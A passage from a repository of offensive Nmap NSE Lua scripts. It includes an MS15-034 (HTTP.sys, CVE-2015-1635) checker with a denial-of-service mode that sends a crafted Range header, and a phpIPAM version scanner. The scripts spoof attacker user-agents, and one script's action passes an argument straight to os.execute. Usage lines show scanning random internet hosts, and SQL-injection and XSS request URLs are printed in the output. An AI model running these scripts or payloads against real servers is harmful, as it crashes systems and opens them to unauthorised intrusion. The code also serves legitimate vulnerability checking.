"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2" 100 | 101 | 102 | -- THE ACTION SECTION -- 103 | if (command == "false") then 104 | action = function(host, port) 105 | 106 | -- Manipulate TCP packet 'header' with false information about attacker :D 107 | local options = {header={}} --> manipulate 'header' request .. 108 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2" --> use MAC OSX,Firefox User-agent OR your own... 109 | options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 110 | options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not cache it) 111 | -- read response from target (http.get) 112 | local response = http.get(host, port, index, options) 113 | 114 | -- Check if 'index' exist on target webserver 115 | if (response.status == 200 ) then 116 | if (read == "true") then 117 | -- Display return code and index body ... 118 | return "\n index: "..index.."\n STATUS: "..response.status.." OK FOUND\n module author: r00t-3xp10it\n user-agent : "..agent_string.."\n\nCONTENTS:\n"..response.body.."\n" 119 | else 120 | -- Display only return code (default behavior)... 121 | return "\n index: "..index.."\n STATUS: "..response.status.." OK FOUND\n module author: r00t-3xp10it\n" 122 | end 123 | 124 | -- More Error codes displays (NOT FOUND)... 125 | elseif (response.status == 400 ) then 126 | return "\n index: "..index.."\n STATUS: "..response.status.." BAD REQUEST\n module author: r00t-3xp10it\n" 127 | elseif (response.status == 302 ) then 128 | return "\n index: "..index.."\n STATUS: "..response.status.." REDIRECTED\n module author: r00t-3xp10it\n" 129 | elseif (response.status == 401 ) then 130 | return "\n index: "..index.."\n STATUS: "..response.status.." UNAUTHORIZED\n module author: r00t-3xp10it\n" 131 | elseif (response.status == 404 ) then 132 | return "\n index: "..index.."\n STATUS: "..response.status.." NOT FOUND\n module author: r00t-3xp10it\n" 133 | elseif (response.status == 403 ) then 134 | return "\n index: "..index.."\n STATUS: "..response.status.." FORBIDDEN\n module author: r00t-3xp10it\n" 135 | elseif (response.status == 503 ) then 136 | return "\n index: "..index.."\n STATUS: "..response.status.." UNAVAILABLE\n module author: r00t-3xp10it\n" 137 | else 138 | -- Undefined error code (NOT FOUND)... 139 | return "\n index: "..index.."\n STATUS: "..response.status.." UNDEFINED ERROR\n module author: r00t-3xp10it\n" 140 | end 141 | end 142 | 143 | else 144 | 145 | -- Execute local system command (args) 146 | action = function(host, port) 147 | os.execute(""..command.."") 148 | return "\n module author: r00t-3xp10it\n sys-command: "..command.."\n" 149 | end 150 | end 151 | -------------------------------------------------------------------------------- /ms15-034.nse: -------------------------------------------------------------------------------- 1 | -- Original nse module written by: DigitalStroopwafel 2 | -- Port nmap nse script to: /usr/share/nmap/scripts 3 | -- Update database: sudo nmap --script-updatedb 4 | -- Usage: sudo nmap --script-help ms15-034.nse 5 | -- Usage: sudo nmap -sV -Pn -p 80 --script ms15-034.nse 6 | -- Usage: sudo nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" 7 | 8 | 9 | -- Dependencies (Lua libs) 10 | -- all dependencies are satisfied (nmap default installation).. 11 | local http = require('http') 12 | local string = require('string') 13 | local shortport = require('shortport') 14 | local stdnse = require ('stdnse') 15 | local vulns = require ('vulns') 16 | 17 | 18 | description = [[ 19 | 20 | author: DigitalStroopwafel, r00t-3xp10it 21 | Detects for the MS15-034 (HTTP.sys) vulnerability on Microsoft IIS servers. and exploit 22 | it using script args (--script-args D0S=exploit) or we can scan further using another 23 | argument (--script-args uri=/wellcome.png), Affected versions are Windows 7, 8, 24 | 8.1, Windows Server 2008 R2, 2012 and 2012R2. 25 | 26 | 27 | Some syntax examples: 28 | nmap -sV -Pn -p 80 --script vuln 29 | nmap -sV -Pn -p 80 --script ms15-034.nse 30 | nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri 31 | nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit 32 | nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" 33 | nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey),D0S=exploit" 34 | nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script ms15-034.nse -oN /root/nmap-report.log 35 | 36 | ]] 37 | 38 | --- 39 | -- @usage 40 | -- nmap --script-help ms15-034.nse 41 | -- nmap -sV -Pn -p 80 --script vuln 42 | -- nmap -sS -Pn -p 80 --script ms15-034.nse 43 | -- nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri/ 44 | -- nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit 45 | -- nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey),D0S=exploit" 46 | -- nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" 47 | -- @output 48 | -- PORT STATE SERVICE 49 | -- 80/tcp open http 50 | -- |_ms15-034: http.sys its Vulnerable 51 | -- | State: VULNERABLE 52 | -- | IDs: CVE-2015-1635 53 | -- | Response: 416 (exploitable) 54 | -- | Disclosure date: 2015-06-17 55 | -- | Author: DigitalStroopwafel(module) 56 | -- | r00t-3xp10it(review) 57 | -- | 58 | -- | Description: 59 | -- | http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on 60 | -- | HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2, 61 | -- | Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. 62 | -- | Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit 63 | -- | Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd 64 | -- | 65 | -- | References: 66 | -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635 67 | -- | https://technet.microsoft.com/en-us/library/security/ms15-034.aspx 68 | -- | http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd 69 | -- |_ 70 | -- @args search.uri - URI to use in request -> Default: / 71 | -- @args payload.D0S - exploit the Denial-Of-Service condition ? -> Default: false 72 | -- @args fakeUser.agent - User-agent to send in header request -> Default: iPhone,safari 73 | --- 74 | 75 | 76 | author = "DigitalStroopwafel, r00t-3xp10it" 77 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 78 | categories = {"vuln", "dos"} 79 | 80 | 81 | 82 | -- THE RULES SECTION -- 83 | -- portrule = shortport.http [added port number and service to portrule] 84 | portrule = shortport.port_or_service({80, 443, 631, 5800}, "http, https, ipp, vnc", "tcp", "open") 85 | -- local uri = "/" [updated to use script arguments (anotheruri)] 86 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/" 87 | 88 | 89 | -- THE ACTION SECTION -- 90 | action = function(host, port) 91 | -- Manipulate TCP packet 'header' with false information about attacker :D 92 | local options = {header={}} --> manipulate 'header' request .. 93 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own... 94 | options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 95 | options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) 96 | 97 | 98 | -- special thanks to 'sathisharthars' POC 'https://goo.gl/lVO1x3' 99 | -- change this script range byte from "0-" to "18-" to exploit D0S 100 | -- using script args to run denial-of-service or scanning for vulnerability 101 | local D0S = stdnse.get_script_args(SCRIPT_NAME..".D0S") 102 | if (D0S == "exploit") then 103 | options['header']['Range'] = "bytes=18-18446744073709551615" 104 | return "Executing Denial-Of-Service Condition...\nstatus : please ping target to comfirm tango down..." 105 | else 106 | options['header']['Range'] = "bytes=0-18446744073709551615" 107 | end 108 | 109 | 110 | -- get response from target website 111 | local response = http.get(host, port, uri, options) 112 | local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)") 113 | 114 | -- display target response (script output) 115 | if ( title == "Requested Range Not Satisfiable" ) then 116 | return "http.sys its Vulnerable\n State: VULNERABLE\n IDs: CVE-2015-1635\n Response: "..response.status.." (exploitable)\n Disclosure date: 2015-06-17\n Author: DigitalStroopwafel(module)\n r00t-3xp10it(review)\n\n Description:\n http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on\n on HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,\n Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.\n Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit \n Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd\n\n References:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635\n https://technet.microsoft.com/en-us/library/security/ms15-034.aspx\n http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd\n\n" 117 | 118 | else 119 | 120 | return "http.sys not Vulnerable\n State: NOT VULNERABLE\n IDs: CVE-2015-1635\n Response: "..response.status.." (we need: 416)\n Disclosure date: 2015-06-17\n Author: DigitalStroopwafel(module)\n r00t-3xp10it(review)\n\n" 121 | 122 | end 123 | end 124 | -------------------------------------------------------------------------------- /phpipam.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE phpipam.nse - Version 1.6 3 | -- Copy script to: /usr/share/nmap/scripts/phpipam.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- executing: nmap --script-help phpipam.nse 6 | -- executing: nmap -sV -Pn -p 80 --open --script phpipam.nse 7 | -- executing: nmap -sV -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam.php 8 | -- executing: nmap -sV -Pn -p 80 --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 9 | --- 10 | 11 | 12 | -- SCRIPT BANNER DESCRIPTION -- 13 | description = [[ 14 | 15 | Module Author: r00t-3xp10it 16 | Vuln discover: Saeed reza 17 | NSE script to detect multiple vulnerabilitys in phpipam (1.2.1 & 1.1.010) versions 18 | of open-source web IP address management application (IPAM). by default phpipam.nse 19 | searches for phpipam.html on target webserver, If target respondes 200 OK then my 20 | script will verify the version installed and If the 2 condictions are true it will 21 | display a vulnerable output. 22 | 23 | 24 | Some Syntax examples: 25 | nmap --script-help phpipam.nse 26 | nmap -sV -Pn -p 80 --open --script phpipam.nse 27 | nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 28 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 29 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 30 | nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 31 | 32 | ]] 33 | 34 | --- 35 | -- @usage 36 | -- nmap --script-help phpipam.nse 37 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse 38 | -- nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 39 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 40 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 41 | -- nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 42 | -- @output 43 | -- PORT STATE SERVICE VERSION 44 | -- 80/tcp open http phpipam 1.2.1 45 | -- | phpipam: 46 | -- | STATUS: VULNERABLE 47 | -- | VERSION: 1.2.1 (likelly exploitable) 48 | -- | Disclosure date: 28 set 2016 49 | -- | Vuln discover: Saeed reza 50 | -- | Module Author: r00t-3xp10it 51 | -- | 52 | -- | Description: 53 | -- | phpipam is an open-source web IP address management application, its goal is to provide light 54 | -- | modern and useful IP address management. It is php-based application with MySQL database backend, 55 | -- | using jQuery libraries, ajax and some HTML5/CSS3 features. 56 | -- | [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50' 57 | -- | [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit 58 | -- | 59 | -- | References: 60 | -- | Vendor: http://phpipam.net/ 61 | -- | Vuln Discover: http://0day.today/exploit/25375 62 | -- | Vuln Discover: https://www.exploit-db.com/exploits/39171/ 63 | -- | Module Author: https://sourceforge.net/u/peterubuntu10/profile/ 64 | -- |_ 65 | -- @args payload.uri the path name to search. Default: /phpipam.html 66 | -- @args payload.agent User-agent to send in request - Default: iPhone,safari 67 | --- 68 | 69 | author = "r00t-3xp10it" 70 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 71 | categories = {"safe", "discovery", "vuln"} 72 | 73 | 74 | 75 | -- DEPENDENCIES (lua nse libraries) -- 76 | local stdnse = require ('stdnse') --> required to use nse arguments 77 | local shortport = require "shortport" 78 | local string = require "string" 79 | local http = require "http" 80 | 81 | 82 | 83 | -- THE RULE SECTION -- 84 | -- portrule = shortport.http --> updated to scan only the selected ports/proto/services 85 | portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open") 86 | -- local uri = "/phpipam.html" --> updated to use script @args payload.uri 87 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/phpipam.html" 88 | 89 | 90 | 91 | -- THE ACTION SECTION -- 92 | action = function(host, port) 93 | -- Manipulate TCP packet 'header' with false information about attacker :D 94 | local options = {header={}} --> manipulate 'header' request .. 95 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own... 96 | options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 97 | options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) 98 | -- read response from target (http.get) 99 | local response = http.get(host, port, uri, options) 100 | 101 | 102 | -- check if target its phpipam based website 103 | if ( response.status == 200 ) then 104 | local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>phpipam ([^<]*)") 105 | 106 | -- check the phpipam version installed 107 | if ( title == "1.2.1" ) or ( title == "1.1.010" ) then 108 | -- VULNERABLE nse module output display 109 | return "\n STATUS: VULNERABLE\n VERSION: "..title.." (likelly exploitable)\n Disclosure date: 28 set 2016\n Vuln discover: Saeed reza\n Module Author: r00t-3xp10it\n\n Description:\n phpipam is an open-source web IP address management application, its goal is to provide light\n modern and useful IP address management. It is php-based application with MySQL database backend,\n using jQuery libraries, ajax and some HTML5/CSS3 features.\n [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50'\n [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit\n\n References:\n Vendor: http://phpipam.net/\n Vuln Discover: http://0day.today/exploit/25375\n Vuln Discover: https://www.exploit-db.com/exploits/39171/\n Module Author: https://sourceforge.net/u/peterubuntu10/profile/\n\n" 110 | else 111 | -- NOT VULNERABLE version install found (1.2.1) of phpipam in target system 112 | return "\n STATUS: NOT VULNERABLE\n index: "..uri..": 200 Found\n VERSION: "..title.." (wrong version)\n Module Author: r00t-3xp10it\n\n" 113 | end 114 | 115 | -- check for diferent google return codes 116 | -- to display a NON VULNERABLE output... 117 | elseif ( response.status == 404 ) then 118 | return "\n index: "..uri.."\n STATUS: "..response.status.." NOT FOUND\n module author: r00t-3xp10it\n\n" 119 | elseif ( response.status == 400 ) then 120 | return "\n index: "..uri.."\n STATUS: "..response.status.." BAD REQUEST\n module author: r00t-3xp10it\n\n" 121 | elseif ( response.status == 401 ) then 122 | return "\n index: "..uri.."\n STATUS: "..response.status.." UNAUTHORIZED\n module author: r00t-3xp10it\n\n" 123 | elseif ( response.status == 302 ) then 124 | return "\n index: "..uri.."\n STATUS: "..response.status.." REDIRECTED\n module author: r00t-3xp10it\n\n" 125 | else 126 | -- I dont want to write more response.status ... so i let my module displays the returned code :D 127 | return "\n index: "..uri.."\n STATUS: "..response.status.." response code\n module author: r00t-3xp10it\n\n" 128 | end 129 | end 130 | -------------------------------------------------------------------------------- /xeoon-itachitux.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/nmap-nse-modules/266c676c06a9169bbdce5e5e2148a4e01adc0712/xeoon-itachitux.png --------------------------------------------------------------------------------